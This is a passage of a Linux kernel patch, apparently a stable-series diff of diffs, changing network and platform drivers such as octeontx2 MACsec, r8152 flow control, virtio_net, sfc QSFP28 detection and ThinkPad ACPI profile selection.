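	       (unsigned long long)field_get(0xffffull, npc_const3),
	       (unsigned long long)field_get(0xff000000ull, npc_const3));
	return 0;
}
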
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.h
+index 3efeb09c58dec..a1c3d987b8044 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.h
+@@ -31,6 +31,12 @@
+ 	rvu_write64(rvu, blkaddr,	\
+ 		    NPC_AF_INTFX_HASHX_MASKX(intf, ld, mask_idx), cfg)
+ 
++#define GET_KEX_LD_HASH_CTRL(intf, ld)	\
++	rvu_read64(rvu, blkaddr, NPC_AF_INTFX_HASHX_RESULT_CTRL(intf, ld))
++
++#define GET_KEX_LD_HASH_MASK(intf, ld, mask_idx)	\
++	rvu_read64(rvu, blkaddr, NPC_AF_INTFX_HASHX_MASKX(intf, ld, mask_idx))
++
+ #define SET_KEX_LD_HASH_CTRL(intf, ld, cfg) \
+ 	rvu_write64(rvu, blkaddr,	\
+ 		    NPC_AF_INTFX_HASHX_RESULT_CTRL(intf, ld), cfg)
+@@ -56,8 +62,8 @@ void npc_update_field_hash(struct rvu *rvu, u8 intf,
+ 			   struct flow_msg *omask);
+ void npc_config_secret_key(struct rvu *rvu, int blkaddr);
+ void npc_program_mkex_hash(struct rvu *rvu, int blkaddr);
+-u32 npc_field_hash_calc(u64 *ldata, struct npc_mcam_kex_hash *mkex_hash,
+-			u64 *secret_key, u8 intf, u8 hash_idx);
++u32 npc_field_hash_calc(u64 *ldata, struct npc_get_field_hash_info_rsp rsp,
++			u8 intf, u8 hash_idx);
+ 
+ static struct npc_mcam_kex_hash npc_mkex_hash_default __maybe_unused = {
+ 	.lid_lt_ld_hash_en = {
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/cn10k_macsec.c b/drivers/net/ethernet/marvell/octeontx2/nic/cn10k_macsec.c
+index 9ec5f38d38a84..a487a98eac88c 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/cn10k_macsec.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/cn10k_macsec.c
+@@ -9,6 +9,7 @@
+ #include <net/macsec.h>
+ #include "otx2_common.h"
+ 
++#define MCS_TCAM0_MAC_DA_MASK		GENMASK_ULL(47, 0)
+ #define MCS_TCAM0_MAC_SA_MASK		GENMASK_ULL(63, 48)
+ #define MCS_TCAM1_MAC_SA_MASK		GENMASK_ULL(31, 0)
+ #define MCS_TCAM1_ETYPE_MASK		GENMASK_ULL(47, 32)
+@@ -149,11 +150,20 @@ static void cn10k_mcs_free_rsrc(struct otx2_nic *pfvf, enum mcs_direction dir,
+ 				enum mcs_rsrc_type type, u16 hw_rsrc_id,
+ 				bool all)
+ {
++	struct mcs_clear_stats *clear_req;
+ 	struct mbox *mbox = &pfvf->mbox;
+ 	struct mcs_free_rsrc_req *req;
+ 
+ 	mutex_lock(&mbox->lock);
+ 
++	clear_req = otx2_mbox_alloc_msg_mcs_clear_stats(mbox);
++	if (!clear_req)
++		goto fail;
++
++	clear_req->id = hw_rsrc_id;
++	clear_req->type = type;
++	clear_req->dir = dir;
++
+ 	req = otx2_mbox_alloc_msg_mcs_free_resources(mbox);
+ 	if (!req)
+ 		goto fail;
+@@ -237,8 +247,10 @@ static int cn10k_mcs_write_rx_flowid(struct otx2_nic *pfvf,
+ 				     struct cn10k_mcs_rxsc *rxsc, u8 hw_secy_id)
+ {
+ 	struct macsec_rx_sc *sw_rx_sc = rxsc->sw_rxsc;
++	struct macsec_secy *secy = rxsc->sw_secy;
+ 	struct mcs_flowid_entry_write_req *req;
+ 	struct mbox *mbox = &pfvf->mbox;
++	u64 mac_da;
+ 	int ret;
+ 
+ 	mutex_lock(&mbox->lock);
+@@ -249,11 +261,16 @@ static int cn10k_mcs_write_rx_flowid(struct otx2_nic *pfvf,
+ 		goto fail;
+ 	}
+ 
++	mac_da = ether_addr_to_u64(secy->netdev->dev_addr);
++
++	req->data[0] = FIELD_PREP(MCS_TCAM0_MAC_DA_MASK, mac_da);
++	req->mask[0] = ~0ULL;
++	req->mask[0] = ~MCS_TCAM0_MAC_DA_MASK;
++
+ 	req->data[1] = FIELD_PREP(MCS_TCAM1_ETYPE_MASK, ETH_P_MACSEC);
+ 	req->mask[1] = ~0ULL;
+ 	req->mask[1] &= ~MCS_TCAM1_ETYPE_MASK;
+ 
+-	req->mask[0] = ~0ULL;
+ 	req->mask[2] = ~0ULL;
+ 	req->mask[3] = ~0ULL;
+ 
+@@ -997,7 +1014,7 @@ static void cn10k_mcs_sync_stats(struct otx2_nic *pfvf, struct macsec_secy *secy
+ 
+ 	/* Check if sync is really needed */
+ 	if (secy->validate_frames == txsc->last_validate_frames &&
+-	    secy->protect_frames == txsc->last_protect_frames)
++	    secy->replay_protect == txsc->last_replay_protect)
+ 		return;
+ 
+ 	cn10k_mcs_secy_stats(pfvf, txsc->hw_secy_id_rx, &rx_rsp, MCS_RX, true);
+@@ -1019,19 +1036,19 @@ static void cn10k_mcs_sync_stats(struct otx2_nic *pfvf, struct macsec_secy *secy
+ 		rxsc->stats.InPktsInvalid += sc_rsp.pkt_invalid_cnt;
+ 		rxsc->stats.InPktsNotValid += sc_rsp.pkt_notvalid_cnt;
+ 
+-		if (txsc->last_protect_frames)
++		if (txsc->last_replay_protect)
+ 			rxsc->stats.InPktsLate += sc_rsp.pkt_late_cnt;
+ 		else
+ 			rxsc->stats.InPktsDelayed += sc_rsp.pkt_late_cnt;
+ 
+-		if (txsc->last_validate_frames == MACSEC_VALIDATE_CHECK)
++		if (txsc->last_validate_frames == MACSEC_VALIDATE_DISABLED)
+ 			rxsc->stats.InPktsUnchecked += sc_rsp.pkt_unchecked_cnt;
+ 		else
+ 			rxsc->stats.InPktsOK += sc_rsp.pkt_unchecked_cnt;
+ 	}
+ 
+ 	txsc->last_validate_frames = secy->validate_frames;
+-	txsc->last_protect_frames = secy->protect_frames;
++	txsc->last_replay_protect = secy->replay_protect;
+ }
+ 
+ static int cn10k_mdo_open(struct macsec_context *ctx)
+@@ -1100,7 +1117,7 @@ static int cn10k_mdo_add_secy(struct macsec_context *ctx)
+ 	txsc->sw_secy = secy;
+ 	txsc->encoding_sa = secy->tx_sc.encoding_sa;
+ 	txsc->last_validate_frames = secy->validate_frames;
+-	txsc->last_protect_frames = secy->protect_frames;
++	txsc->last_replay_protect = secy->replay_protect;
+ 
+ 	list_add(&txsc->entry, &cfg->txsc_list);
+ 
+@@ -1117,6 +1134,7 @@ static int cn10k_mdo_upd_secy(struct macsec_context *ctx)
+ 	struct macsec_secy *secy = ctx->secy;
+ 	struct macsec_tx_sa *sw_tx_sa;
+ 	struct cn10k_mcs_txsc *txsc;
++	bool active;
+ 	u8 sa_num;
+ 	int err;
+ 
+@@ -1124,15 +1142,19 @@ static int cn10k_mdo_upd_secy(struct macsec_context *ctx)
+ 	if (!txsc)
+ 		return -ENOENT;
+ 
+-	txsc->encoding_sa = secy->tx_sc.encoding_sa;
+-
+-	sa_num = txsc->encoding_sa;
+-	sw_tx_sa = rcu_dereference_bh(secy->tx_sc.sa[sa_num]);
++	/* Encoding SA got changed */
++	if (txsc->encoding_sa != secy->tx_sc.encoding_sa) {
++		txsc->encoding_sa = secy->tx_sc.encoding_sa;
++		sa_num = txsc->encoding_sa;
++		sw_tx_sa = rcu_dereference_bh(secy->tx_sc.sa[sa_num]);
++		active = sw_tx_sa ? sw_tx_sa->active : false;
++		cn10k_mcs_link_tx_sa2sc(pfvf, secy, txsc, sa_num, active);
++	}
+ 
+ 	if (netif_running(secy->netdev)) {
+ 		cn10k_mcs_sync_stats(pfvf, secy, txsc);
+ 
+-		err = cn10k_mcs_secy_tx_cfg(pfvf, secy, txsc, sw_tx_sa, sa_num);
++		err = cn10k_mcs_secy_tx_cfg(pfvf, secy, txsc, NULL, 0);
+ 		if (err)
+ 			return err;
+ 	}
+@@ -1521,12 +1543,12 @@ static int cn10k_mdo_get_rx_sc_stats(struct macsec_context *ctx)
+ 	rxsc->stats.InPktsInvalid += rsp.pkt_invalid_cnt;
+ 	rxsc->stats.InPktsNotValid += rsp.pkt_notvalid_cnt;
+ 
+-	if (secy->protect_frames)
++	if (secy->replay_protect)
+ 		rxsc->stats.InPktsLate += rsp.pkt_late_cnt;
+ 	else
+ 		rxsc->stats.InPktsDelayed += rsp.pkt_late_cnt;
+ 
+-	if (secy->validate_frames == MACSEC_VALIDATE_CHECK)
++	if (secy->validate_frames == MACSEC_VALIDATE_DISABLED)
+ 		rxsc->stats.InPktsUnchecked += rsp.pkt_unchecked_cnt;
+ 	else
+ 		rxsc->stats.InPktsOK += rsp.pkt_unchecked_cnt;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+index 712715a49d201..241016ca64d05 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+@@ -332,11 +332,11 @@ struct otx2_flow_config {
+ #define OTX2_PER_VF_VLAN_FLOWS	2 /* Rx + Tx per VF */
+ #define OTX2_VF_VLAN_RX_INDEX	0
+ #define OTX2_VF_VLAN_TX_INDEX	1
+-	u16			max_flows;
+-	u8			dmacflt_max_flows;
+ 	u32			*bmap_to_dmacindex;
+ 	unsigned long		*dmacflt_bmap;
+ 	struct list_head	flow_list;
++	u32			dmacflt_max_flows;
++	u16                     max_flows;
+ };
+ 
+ struct otx2_tc_info {
+@@ -386,7 +386,7 @@ struct cn10k_mcs_txsc {
+ 	struct cn10k_txsc_stats stats;
+ 	struct list_head entry;
+ 	enum macsec_validation_type last_validate_frames;
+-	bool last_protect_frames;
++	bool last_replay_protect;
+ 	u16 hw_secy_id_tx;
+ 	u16 hw_secy_id_rx;
+ 	u16 hw_flow_id;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
+index 0f7345a96965b..d0554f6d26731 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
+@@ -164,6 +164,8 @@ EXPORT_SYMBOL(otx2_alloc_mcam_entries);
+ static int otx2_mcam_entry_init(struct otx2_nic *pfvf)
+ {
+ 	struct otx2_flow_config *flow_cfg = pfvf->flow_cfg;
++	struct npc_get_field_status_req *freq;
++	struct npc_get_field_status_rsp *frsp;
+ 	struct npc_mcam_alloc_entry_req *req;
+ 	struct npc_mcam_alloc_entry_rsp *rsp;
+ 	int vf_vlan_max_flows;
+@@ -214,8 +216,29 @@ static int otx2_mcam_entry_init(struct otx2_nic *pfvf)
+ 	flow_cfg->rx_vlan_offset = flow_cfg->unicast_offset +
+ 					OTX2_MAX_UNICAST_FLOWS;
+ 	pfvf->flags |= OTX2_FLAG_UCAST_FLTR_SUPPORT;
+-	pfvf->flags |= OTX2_FLAG_RX_VLAN_SUPPORT;
+-	pfvf->flags |= OTX2_FLAG_VF_VLAN_SUPPORT;
++
++	/* Check if NPC_DMAC field is supported
++	 * by the mkex profile before setting VLAN support flag.
++	 */
++	freq = otx2_mbox_alloc_msg_npc_get_field_status(&pfvf->mbox);
++	if (!freq) {
++		mutex_unlock(&pfvf->mbox.lock);
++		return -ENOMEM;
++	}
++
++	freq->field = NPC_DMAC;
++	if (otx2_sync_mbox_msg(&pfvf->mbox)) {
++		mutex_unlock(&pfvf->mbox.lock);
++		return -EINVAL;
++	}
++
++	frsp = (struct npc_get_field_status_rsp *)otx2_mbox_get_rsp
++	       (&pfvf->mbox.mbox, 0, &freq->hdr);
++
++	if (frsp->enable) {
++		pfvf->flags |= OTX2_FLAG_RX_VLAN_SUPPORT;
++		pfvf->flags |= OTX2_FLAG_VF_VLAN_SUPPORT;
++	}
+ 
+ 	pfvf->flags |= OTX2_FLAG_MCAM_ENTRIES_ALLOC;
+ 	mutex_unlock(&pfvf->mbox.lock);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+index 303930499a4c0..ed911d9946277 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+@@ -1835,13 +1835,22 @@ int otx2_open(struct net_device *netdev)
+ 		otx2_dmacflt_reinstall_flows(pf);
+ 
+ 	err = otx2_rxtx_enable(pf, true);
+-	if (err)
++	/* If an mbox communication error happens at this point, the
++	 * interface ends up in a state where it is down but the
++	 * hardware mcam entries are enabled to receive packets.
++	 * Hence disable the packet I/O.
++	 */
++	if (err == EIO)
++		goto err_disable_rxtx;
++	else if (err)
+ 		goto err_tx_stop_queues;
+ 
+ 	otx2_do_set_rx_mode(pf);
+ 
+ 	return 0;
+ 
++err_disable_rxtx:
++	otx2_rxtx_enable(pf, false);
+ err_tx_stop_queues:
+ 	netif_tx_stop_all_queues(netdev);
+ 	netif_carrier_off(netdev);
+@@ -3069,8 +3078,6 @@ static void otx2_remove(struct pci_dev *pdev)
+ 		otx2_config_pause_frm(pf);
+ 	}
+ 
+-	cn10k_mcs_free(pf);
+-
+ #ifdef CONFIG_DCB
+ 	/* Disable PFC config */
+ 	if (pf->pfc_en) {
+@@ -3084,6 +3091,7 @@ static void otx2_remove(struct pci_dev *pdev)
+ 
+ 	otx2_unregister_dl(pf);
+ 	unregister_netdev(netdev);
++	cn10k_mcs_free(pf);
+ 	otx2_sriov_disable(pf->pdev);
+ 	otx2_sriov_vfcfg_cleanup(pf);
+ 	if (pf->otx2_wq)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+index ab126f8706c74..53366dbfbf27c 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+@@ -621,7 +621,7 @@ static int otx2vf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 
+ 	err = otx2vf_realloc_msix_vectors(vf);
+ 	if (err)
+-		goto err_mbox_destroy;
++		goto err_detach_rsrc;
+ 
+ 	err = otx2_set_real_num_queues(netdev, qcount, qcount);
+ 	if (err)
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_devlink.c b/drivers/net/ethernet/pensando/ionic/ionic_devlink.c
+index 4297ed9024c01..2696dac21b096 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_devlink.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_devlink.c
+@@ -65,6 +65,8 @@ struct ionic *ionic_devlink_alloc(struct device *dev)
+ 	struct devlink *dl;
+ 
+ 	dl = devlink_alloc(&ionic_dl_ops, sizeof(struct ionic), dev);
++	if (!dl)
++		return NULL;
+ 
+ 	return devlink_priv(dl);
+ }
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_ethtool.c b/drivers/net/ethernet/pensando/ionic/ionic_ethtool.c
+index 01c22701482d9..d7370fb60a168 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_ethtool.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_ethtool.c
+@@ -691,7 +691,7 @@ static int ionic_get_rxnfc(struct net_device *netdev,
+ 		info->data = lif->nxqs;
+ 		break;
+ 	default:
+-		netdev_err(netdev, "Command parameter %d is not supported\n",
++		netdev_dbg(netdev, "Command parameter %d is not supported\n",
+ 			   info->cmd);
+ 		err = -EOPNOTSUPP;
+ 	}
+diff --git a/drivers/net/ethernet/sfc/mcdi_port_common.c b/drivers/net/ethernet/sfc/mcdi_port_common.c
+index 899cc16710048..0ab14f3d01d4d 100644
+--- a/drivers/net/ethernet/sfc/mcdi_port_common.c
++++ b/drivers/net/ethernet/sfc/mcdi_port_common.c
+@@ -972,12 +972,15 @@ static u32 efx_mcdi_phy_module_type(struct efx_nic *efx)
+ 
+ 	/* A QSFP+ NIC may actually have an SFP+ module attached.
+ 	 * The ID is page 0, byte 0.
++	 * QSFP28 is of type SFF_8636; however, ethtool treats it
++	 * the same, so we can also treat them the same.
+ 	 */
+ 	switch (efx_mcdi_phy_get_module_eeprom_byte(efx, 0, 0)) {
+-	case 0x3:
++	case 0x3: /* SFP */
+ 		return MC_CMD_MEDIA_SFP_PLUS;
+-	case 0xc:
+-	case 0xd:
++	case 0xc: /* QSFP */
++	case 0xd: /* QSFP+ */
++	case 0x11: /* QSFP28 */
+ 		return MC_CMD_MEDIA_QSFP_PLUS;
+ 	default:
+ 		return 0;
+@@ -1075,7 +1078,7 @@ int efx_mcdi_phy_get_module_info(struct efx_nic *efx, struct ethtool_modinfo *mo
+ 
+ 	case MC_CMD_MEDIA_QSFP_PLUS:
+ 		modinfo->type = ETH_MODULE_SFF_8436;
+-		modinfo->eeprom_len = ETH_MODULE_SFF_8436_LEN;
++		modinfo->eeprom_len = ETH_MODULE_SFF_8436_MAX_LEN;
+ 		break;
+ 
+ 	default:
+diff --git a/drivers/net/usb/r8152.c b/drivers/net/usb/r8152.c
+index 23da1d9dafd1f..059d610901d84 100644
+--- a/drivers/net/usb/r8152.c
++++ b/drivers/net/usb/r8152.c
+@@ -199,6 +199,7 @@
+ #define OCP_EEE_AR		0xa41a
+ #define OCP_EEE_DATA		0xa41c
+ #define OCP_PHY_STATUS		0xa420
++#define OCP_INTR_EN		0xa424
+ #define OCP_NCTL_CFG		0xa42c
+ #define OCP_POWER_CFG		0xa430
+ #define OCP_EEE_CFG		0xa432
+@@ -620,6 +621,9 @@ enum spd_duplex {
+ #define PHY_STAT_LAN_ON		3
+ #define PHY_STAT_PWRDN		5
+ 
++/* OCP_INTR_EN */
++#define INTR_SPEED_FORCE	BIT(3)
++
+ /* OCP_NCTL_CFG */
+ #define PGA_RETURN_EN		BIT(1)
+ 
+@@ -3023,12 +3027,16 @@ static int rtl_enable(struct r8152 *tp)
+ 	ocp_write_byte(tp, MCU_TYPE_PLA, PLA_CR, ocp_data);
+ 
+ 	switch (tp->version) {
+-	case RTL_VER_08:
+-	case RTL_VER_09:
+-	case RTL_VER_14:
+-		r8153b_rx_agg_chg_indicate(tp);
++	case RTL_VER_01:
++	case RTL_VER_02:
++	case RTL_VER_03:
++	case RTL_VER_04:
++	case RTL_VER_05:
++	case RTL_VER_06:
++	case RTL_VER_07:
+ 		break;
+ 	default:
++		r8153b_rx_agg_chg_indicate(tp);
+ 		break;
+ 	}
+ 
+@@ -3082,7 +3090,6 @@ static void r8153_set_rx_early_timeout(struct r8152 *tp)
+ 			       640 / 8);
+ 		ocp_write_word(tp, MCU_TYPE_USB, USB_RX_EXTRA_AGGR_TMR,
+ 			       ocp_data);
+-		r8153b_rx_agg_chg_indicate(tp);
+ 		break;
+ 
+ 	default:
+@@ -3116,7 +3123,6 @@ static void r8153_set_rx_early_size(struct r8152 *tp)
+ 	case RTL_VER_15:
+ 		ocp_write_word(tp, MCU_TYPE_USB, USB_RX_EARLY_SIZE,
+ 			       ocp_data / 8);
+-		r8153b_rx_agg_chg_indicate(tp);
+ 		break;
+ 	default:
+ 		WARN_ON_ONCE(1);
+@@ -5986,6 +5992,25 @@ static void rtl8153_disable(struct r8152 *tp)
+ 	r8153_aldps_en(tp, true);
+ }
+ 
++static u32 fc_pause_on_auto(struct r8152 *tp)
++{
++	return (ALIGN(mtu_to_size(tp->netdev->mtu), 1024) + 6 * 1024);
++}
++
++static u32 fc_pause_off_auto(struct r8152 *tp)
++{
++	return (ALIGN(mtu_to_size(tp->netdev->mtu), 1024) + 14 * 1024);
++}
++
++static void r8156_fc_parameter(struct r8152 *tp)
++{
++	u32 pause_on = tp->fc_pause_on ? tp->fc_pause_on : fc_pause_on_auto(tp);
++	u32 pause_off = tp->fc_pause_off ? tp->fc_pause_off : fc_pause_off_auto(tp);
++
++	ocp_write_word(tp, MCU_TYPE_PLA, PLA_RX_FIFO_FULL, pause_on / 16);
++	ocp_write_word(tp, MCU_TYPE_PLA, PLA_RX_FIFO_EMPTY, pause_off / 16);
++}
++
+ static int rtl8156_enable(struct r8152 *tp)
+ {
+ 	u32 ocp_data;
+@@ -5994,6 +6019,7 @@ static int rtl8156_enable(struct r8152 *tp)
+ 	if (test_bit(RTL8152_UNPLUG, &tp->flags))
+ 		return -ENODEV;
+ 
++	r8156_fc_parameter(tp);
+ 	set_tx_qlen(tp);
+ 	rtl_set_eee_plus(tp);
+ 	r8153_set_rx_early_timeout(tp);
+@@ -6025,9 +6051,24 @@ static int rtl8156_enable(struct r8152 *tp)
+ 		ocp_write_word(tp, MCU_TYPE_USB, USB_L1_CTRL, ocp_data);
+ 	}
+ 
++	ocp_data = ocp_read_word(tp, MCU_TYPE_USB, USB_FW_TASK);
++	ocp_data &= ~FC_PATCH_TASK;
++	ocp_write_word(tp, MCU_TYPE_USB, USB_FW_TASK, ocp_data);
++	usleep_range(1000, 2000);
++	ocp_data |= FC_PATCH_TASK;
++	ocp_write_word(tp, MCU_TYPE_USB, USB_FW_TASK, ocp_data);
++
+ 	return rtl_enable(tp);
+ }
+ 
++static void rtl8156_disable(struct r8152 *tp)
++{
++	ocp_write_word(tp, MCU_TYPE_PLA, PLA_RX_FIFO_FULL, 0);
++	ocp_write_word(tp, MCU_TYPE_PLA, PLA_RX_FIFO_EMPTY, 0);
++
++	rtl8153_disable(tp);
++}
++
+ static int rtl8156b_enable(struct r8152 *tp)
+ {
+ 	u32 ocp_data;
+@@ -6429,25 +6470,6 @@ static void rtl8153c_up(struct r8152 *tp)
+ 	r8153b_u1u2en(tp, true);
+ }
+ 
+-static inline u32 fc_pause_on_auto(struct r8152 *tp)
+-{
+-	return (ALIGN(mtu_to_size(tp->netdev->mtu), 1024) + 6 * 1024);
+-}
+-
+-static inline u32 fc_pause_off_auto(struct r8152 *tp)
+-{
+-	return (ALIGN(mtu_to_size(tp->netdev->mtu), 1024) + 14 * 1024);
+-}
+-
+-static void r8156_fc_parameter(struct r8152 *tp)
+-{
+-	u32 pause_on = tp->fc_pause_on ? tp->fc_pause_on : fc_pause_on_auto(tp);
+-	u32 pause_off = tp->fc_pause_off ? tp->fc_pause_off : fc_pause_off_auto(tp);
+-
+-	ocp_write_word(tp, MCU_TYPE_PLA, PLA_RX_FIFO_FULL, pause_on / 16);
+-	ocp_write_word(tp, MCU_TYPE_PLA, PLA_RX_FIFO_EMPTY, pause_off / 16);
+-}
+-
+ static void rtl8156_change_mtu(struct r8152 *tp)
+ {
+ 	u32 rx_max_size = mtu_to_size(tp->netdev->mtu);
+@@ -7538,6 +7560,11 @@ static void r8156_hw_phy_cfg(struct r8152 *tp)
+ 				      ((swap_a & 0x1f) << 8) |
+ 				      ((swap_a >> 8) & 0x1f));
+ 		}
++
++		/* Notify the MAC when the speed is changed to force mode. */
++		data = ocp_reg_read(tp, OCP_INTR_EN);
++		data |= INTR_SPEED_FORCE;
++		ocp_reg_write(tp, OCP_INTR_EN, data);
+ 		break;
+ 	default:
+ 		break;
+@@ -7933,6 +7960,11 @@ static void r8156b_hw_phy_cfg(struct r8152 *tp)
+ 		break;
+ 	}
+ 
++	/* Notify the MAC when the speed is changed to force mode. */
++	data = ocp_reg_read(tp, OCP_INTR_EN);
++	data |= INTR_SPEED_FORCE;
++	ocp_reg_write(tp, OCP_INTR_EN, data);
++
+ 	if (rtl_phy_patch_request(tp, true, true))
+ 		return;
+ 
+@@ -9377,7 +9409,7 @@ static int rtl_ops_init(struct r8152 *tp)
+ 	case RTL_VER_10:
+ 		ops->init		= r8156_init;
+ 		ops->enable		= rtl8156_enable;
+-		ops->disable		= rtl8153_disable;
++		ops->disable		= rtl8156_disable;
+ 		ops->up			= rtl8156_up;
+ 		ops->down		= rtl8156_down;
+ 		ops->unload		= rtl8153_unload;
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index 3f1883814ce21..9a612b13b4e46 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -3405,12 +3405,14 @@ static void free_unused_bufs(struct virtnet_info *vi)
+ 		struct virtqueue *vq = vi->sq[i].vq;
+ 		while ((buf = virtqueue_detach_unused_buf(vq)) != NULL)
+ 			virtnet_sq_free_unused_buf(vq, buf);
++		cond_resched();
+ 	}
+ 
+ 	for (i = 0; i < vi->max_queue_pairs; i++) {
+ 		struct virtqueue *vq = vi->rq[i].vq;
+ 		while ((buf = virtqueue_detach_unused_buf(vq)) != NULL)
+ 			virtnet_rq_free_unused_buf(vq, buf);
++		cond_resched();
+ 	}
+ }
+ 
+diff --git a/drivers/net/wireless/realtek/rtw88/rtw8821c.c b/drivers/net/wireless/realtek/rtw88/rtw8821c.c
+index 9afdc5ce86b43..609a2b86330d8 100644
+--- a/drivers/net/wireless/realtek/rtw88/rtw8821c.c
++++ b/drivers/net/wireless/realtek/rtw88/rtw8821c.c
+@@ -41,7 +41,7 @@ static int rtw8821c_read_efuse(struct rtw_dev *rtwdev, u8 *log_map)
+ 
+ 	map = (struct rtw8821c_efuse *)log_map;
+ 
+-	efuse->rfe_option = map->rfe_option;
++	efuse->rfe_option = map->rfe_option & 0x1f;
+ 	efuse->rf_board_option = map->rf_board_option;
+ 	efuse->crystal_cap = map->xtal_k;
+ 	efuse->pa_type_2g = map->pa_type;
+diff --git a/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c b/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c
+index cb24de9e97dc5..fa8f14c925ec3 100644
+--- a/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c
++++ b/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c
+@@ -44,14 +44,18 @@ static ssize_t store_min_max_freq_khz(struct uncore_data *data,
+ 				      int min_max)
+ {
+ 	unsigned int input;
++	int ret;
+ 
+ 	if (kstrtouint(buf, 10, &input))
+ 		return -EINVAL;
+ 
+ 	mutex_lock(&uncore_lock);
+-	uncore_write(data, input, min_max);
++	ret = uncore_write(data, input, min_max);
+ 	mutex_unlock(&uncore_lock);
+ 
++	if (ret)
++		return ret;
++
+ 	return count;
+ }
+ 
+diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c
+index d1ec31086e9ba..5b2c8dd2861b7 100644
+--- a/drivers/platform/x86/thinkpad_acpi.c
++++ b/drivers/platform/x86/thinkpad_acpi.c
+@@ -10322,6 +10322,7 @@ static atomic_t dytc_ignore_event = ATOMIC_INIT(0);
+ static DEFINE_MUTEX(dytc_mutex);
+ static int dytc_capabilities;
+ static bool dytc_mmc_get_available;
++static int profile_force;
+ 
+ static int convert_dytc_to_profile(int funcmode, int dytcmode,
+ 		enum platform_profile_option *profile)
+@@ -10584,6 +10585,21 @@ static int tpacpi_dytc_profile_init(struct ibm_init_struct *iibm)
+ 	if (err)
+ 		return err;
+ 
++	/* Check if user wants to override the profile selection */
++	if (profile_force) {
++		switch (profile_force) {
++		case -1:
++			dytc_capabilities = 0;
++			break;
++		case 1:
++			dytc_capabilities = BIT(DYTC_FC_MMC);
++			break;
++		case 2:
++			dytc_capabilities = BIT(DYTC_FC_PSC);
++			break;
++		}
++		pr_debug("Profile selection forced: 0x%x\n", dytc_capabilities);
++	}
+ 	if (dytc_capabilities & BIT(DYTC_FC_MMC)) { /* MMC MODE */
+ 		pr_debug("MMC is supported\n");
+ 		/*
+@@ -10597,11 +10613,6 @@ static int tpacpi_dytc_profile_init(struct ibm_init_struct *iibm)
+ 				dytc_mmc_get_available = true;
+ 		}
+ 	} else if (dytc_capabilities & BIT(DYTC_FC_PSC)) { /* PSC MODE */
+-		/* Support for this only works on AMD platforms */
+-		if (boot_cpu_data.x86_vendor != X86_VENDOR_AMD) {
+-			dbg_printk(TPACPI_DBG_INIT, "PSC not support on Intel platforms\n");
+-			return -ENODEV;
+-		}
+ 		pr_debug("PSC is supported\n");
+ 	} else {
+ 		dbg_printk(TPACPI_DBG_INIT, "No DYTC support available\n");
+@@ -11650,6 +11661,9 @@ MODULE_PARM_DESC(uwb_state,
+ 		 "Initial state of the emulated UWB switch");
+ #endif
+ 
++module_param(profile_force, int, 0444);
++MODULE_PARM_DESC(profile_force, "Force profile mode. -1=off, 1=MMC, 2=PSC");
++
+ static void thinkpad_acpi_module_exit(void)
+ {
+ 	struct ibm_struct *ibm, *itmp;
+diff --git a/drivers/platform/x86/touchscreen_dmi.c b/drivers/platform/x86/touchscreen_dmi.c
+index 13802a3c3591d..68e66b60445c3 100644
+--- a/drivers/platform/x86/touchscreen_dmi.c
++++ b/drivers/platform/x86/touchscreen_dmi.c
+@@ -336,6 +336,22 @@ static const struct ts_dmi_data dexp_ursus_7w_data = {
+ 	.properties	= dexp_ursus_7w_props,
+ };
+ 
++static const struct property_entry dexp_ursus_kx210i_props[] = {
++	PROPERTY_ENTRY_U32("touchscreen-min-x", 5),
++	PROPERTY_ENTRY_U32("touchscreen-min-y",  2),
++	PROPERTY_ENTRY_U32("touchscreen-size-x", 1720),
++	PROPERTY_ENTRY_U32("touchscreen-size-y", 1137),
++	PROPERTY_ENTRY_STRING("firmware-name", "gsl1680-dexp-ursus-kx210i.fw"),
++	PROPERTY_ENTRY_U32("silead,max-fingers", 10),
++	PROPERTY_ENTRY_BOOL("silead,home-button"),
++	{ }
++};
++
++static const struct ts_dmi_data dexp_ursus_kx210i_data = {
++	.acpi_name	= "MSSL1680:00",
++	.properties	= dexp_ursus_kx210i_props,
++};
++
+ static const struct property_entry digma_citi_e200_props[] = {
